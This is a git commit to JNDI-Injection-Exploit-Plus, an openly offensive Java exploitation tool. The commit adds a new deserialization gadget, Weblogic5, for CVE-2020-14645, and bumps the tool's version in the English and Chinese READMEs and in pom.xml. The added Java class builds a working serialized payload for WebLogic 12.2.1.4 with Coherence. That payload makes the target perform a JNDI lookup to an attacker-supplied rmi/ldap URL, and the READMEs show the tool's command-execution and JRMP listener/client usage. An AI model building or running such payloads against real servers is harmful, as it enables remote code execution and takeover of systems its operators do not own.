add weblogic CVE-2020-14645

cckuailong · cckuailong · commit 247958312e5c · 2023-02-22T17:21:19.000+08:00
diff --git a/README.md b/README.md
@@ -35,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
 Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
 Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
 
-#### 3. Deserailization Gadget (total: 54)
+#### 3. Deserailization Gadget (total: 55)
 
 P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^
 
@@ -93,6 +93,7 @@ Weblogic1 :arrow_up:           |@cckuailong                 |weblogic:10.3.6.0,
 Weblogic2 :arrow_up:           |@cckuailong                 |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.0
 Weblogic3 :arrow_up:           |@cckuailong                 |com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager
 Weblogic4 :arrow_up:           |@cckuailong                 |weblogic.common.internal.WLObjectOutputStream
+Weblogic5 :arrow_up:           |@cckuailong                 |weblogic:12.2.1.4, coherence
 Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:1.6.4
 WildFly1 :arrow_up:            |@hugow                      |org.wildfly:wildfly-connector:26.0.1.Final
 
@@ -114,15 +115,15 @@ Apereo  | Apereo 4.1 Deserialization RCE
 - Example
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
+$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
 ```
 
 ![](./img/4.png)
 
 #### Web service to return Deserial Gadgets
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar
+java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar
 ```
 
 ```shell
@@ -142,7 +143,7 @@ P.S. Param wrapper & output is opetional
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 where:
@@ -172,7 +173,7 @@ Points for attention:
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
+$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
 ```
 
 where:
@@ -190,13 +191,13 @@ where:
 - JRMPListener
 
 ```shell
-java -cp JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 ## Examples
@@ -208,7 +209,7 @@ Local demo:
 1. Start the tool like this:
 
    ```shell
-   $ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+   $ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
    ```
 
     Screenshot:
@@ -239,7 +240,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
 ### Deserialization Payloads
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 Base64 Output Result:
diff --git a/README_zh.md b/README_zh.md
@@ -19,7 +19,7 @@ P.S. 具体利用链名称及依赖见 [表格](./README.md)
 #### 使用方法
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 #### 参数说明
@@ -39,7 +39,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar [-C] [command] [-A]
 1. 运行工具
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
 ```
 
 ![](./img/1.png)
@@ -64,7 +64,7 @@ class Test{
 #### 使用方法
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
+$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
 ```
 
 #### 参数说明
@@ -84,7 +84,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar [-C] [command] [-D]
 1. 普通
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 ![](./img/3.png)
@@ -93,12 +93,12 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "/System/Applica
 
 - JRMPListener
 ```
-java -cp JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 ```
-java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 #### 提供反序列化包装器
@@ -111,15 +111,15 @@ Apereo  | Apereo 4.1 反序列化漏洞
 - 示例
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
+$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
 ```
 
 ![](./img/4.png)
 
 #### 可以返回反序列化数据的web服务
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar
+java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar
 ```
 
 ```shell
diff --git a/pom.xml b/pom.xml
@@ -6,7 +6,7 @@
 
     <groupId>cckuailong</groupId>
     <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-    <version>1.8-SNAPSHOT</version>
+    <version>1.9-SNAPSHOT</version>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
diff --git a/src/main/java/payloads/Weblogic5.java b/src/main/java/payloads/Weblogic5.java
@@ -0,0 +1,57 @@
+package payloads;
+
+import com.sun.rowset.JdbcRowSetImpl;
+import com.tangosol.util.comparator.ExtractorComparator;
+import com.tangosol.util.extractor.UniversalExtractor;
+import common.Serializer;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.PayloadRunner;
+
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+
+
+/*
+
+See: https://github.com/Y4er/CVE-2020-14645
+Command: rmi/ldap://xxxxxxx:xxx/EvilObj
+ */
+
+// CVE-2020-14645
+
+@SuppressWarnings({ "rawtypes", "unchecked" })
+@Dependencies({"weblogic:12.2.1.4, coherence"})
+@Authors({ Authors.FROHOFF })
+public class Weblogic5 implements ObjectPayload<Object> {
+
+	public byte[] getObject(final String command) throws Exception {
+		UniversalExtractor extractor = new UniversalExtractor("getDatabaseMetaData()", null, 1);
+		final ExtractorComparator comparator = new ExtractorComparator(extractor);
+
+		JdbcRowSetImpl rowSet = new JdbcRowSetImpl();
+		rowSet.setDataSourceName(command);
+		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
+
+		Object[] q = new Object[]{rowSet, rowSet};
+
+		Field queue1 = queue.getClass().getDeclaredField("queue");
+		queue1.setAccessible(true);
+		queue1.set(queue,q);
+
+		Field queue2 = queue.getClass().getDeclaredField("size");
+		queue2.setAccessible(true);
+		queue2.set(queue,2);
+
+		return Serializer.serialize(queue);
+	}
+
+	public static byte[] getBytes(final String command) throws Exception {
+		return Weblogic5.class.newInstance().getObject(command);
+	}
+
+	public static void main(final String command) throws Exception {
+		PayloadRunner.run(Weblogic5.class, command);
+	}
+
+}
